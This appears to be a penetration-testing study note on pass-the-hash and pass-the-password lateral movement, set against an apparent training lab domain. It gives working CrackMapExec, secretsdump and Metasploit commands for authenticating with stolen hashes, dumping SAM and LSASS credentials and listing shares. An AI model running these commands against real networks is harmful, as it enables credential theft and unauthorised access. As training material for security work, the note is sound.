# Pass Attacks Overview
> 29.07.2024
---

## Explanation

**Pass attacks** are a type of cybersecurity threat where attackers use captured credentials, such as passwords or hashes, to move laterally within a network and gain unauthorized access to systems. The primary goal is to find a valid login on one of the machines within the network, allowing the attacker to escalate privileges and potentially compromise the entire system.

**Pass the Hash** is a hacking technique where an attacker captures a hashed version of a password and uses it to authenticate themselves without needing to know the actual password. 

**Pass the Password** is a simpler concept compared to Pass the Hash. In this attack, the actual plaintext password is captured and used directly by the attacker.

## Workflow

#### 1. Initial Access
- **Objective:** Gain a foothold in the network.
- **Methods:**
    - **Phishing:** Sending emails with malicious attachments or links to employees to trick them into revealing credentials or installing malware.
    - **Exploiting Vulnerabilities:** Taking advantage of known vulnerabilities in software or systems to gain access.
    - **Social Engineering:** Manipulating individuals to disclose sensitive information or credentials.

#### 2. Credential Harvesting
- **Objective:** Capture user credentials, either in plaintext or hashed form.
- **Methods:**
    - **Keylogging:** Using malware to record keystrokes and capture usernames and passwords.
    - **Memory Dumping:** Extracting password hashes directly from the computer's memory.
    - **Network Sniffing:** Monitoring unencrypted network traffic to capture credentials being transmitted.

#### 3. Credential Analysis
- **Objective:** Identify useful credentials for lateral movement.
- **Methods:**
    - **Analyzing Hashes:** Reviewing captured password hashes to determine their potential usability.
    - **Cracking Passwords:** Attempting to decrypt hashed passwords using tools like John the Ripper or Hashcat, especially for weak or common passwords.

#### 4. Lateral Movement
- **Objective:** Move through the network using stolen credentials.
- **Methods:**
    - **Pass the Hash (PtH):** Using hashed credentials to authenticate with other machines on the network without needing the plaintext password.
    - **Pass the Password:** Using plaintext passwords to log into other machines directly.
    - **Remote Access Tools:** Utilizing tools like RDP (Remote Desktop Protocol) or PsExec to execute commands on remote machines.


## How to ["Crackmapexec" ](https://github.com/byt3bl33d3r/CrackMapExec) 

**Pass the Password:**
```bash
crackmapexec smb <ip/CIDR> -u <user> -d <domain> -p <passwd>

crackmapexec smb 10.0.2.0/24 -u fcastle -d MARVEL.local -p Password123
```

**Pass the Hash:**
```bash
crackmapexec smb <ip/CIDR> -u <user> -H <hash> --local-auth

crackmapexec smb 10.0.2.0/24 -u administrator -H $hash --local-auth
```

**Dump  SAM hashes:**
```bash
crackmapexec smb <ip/CIDR> -u <user>> -H <hash> --local-auth --sam

crackmapexec smb 10.0.2.0/24 -u administrator -H $hash --local-auth --sam
```

**Dump shares:**
```bash
crackmapexec smb <ip/CIDR> -u <user> -H <hash> --local-auth --shares

crackmapexec smb 10.0.2.0/24 -u administrator -H $hash --local-auth --shares
```

**Dump lsass with lsassy:**
```bash
crackmapexec smb <ip/CIDR> -u <user> -H <hash> --local-auth -M lsassy

crackmapexec smb 10.0.2.0/24 -u administrator -H $hash --local-auth -M lsassy
```

**Show built in modules:**
```bash
crackmapexec smb -L
```

**The CME DB:**
```bash
cmedb
```

**Cheatsheet from CME:**
https://ptestmethod.readthedocs.io/en/latest/cme.html

## Grab local hashes

**Get hashes via [secretsdump](https://github.com/fin3ss3g0d/secretsdump.py):**
```bash
secretsdump.py <domain>/<user>:<passwd>@<ip>

secretsdump.py MARVEL.local/fcastle:Password123@10.0.2.25
```

**Get hashes via metasploit:**

```bash
msfconsole -q
use windows/smb/psexec
```

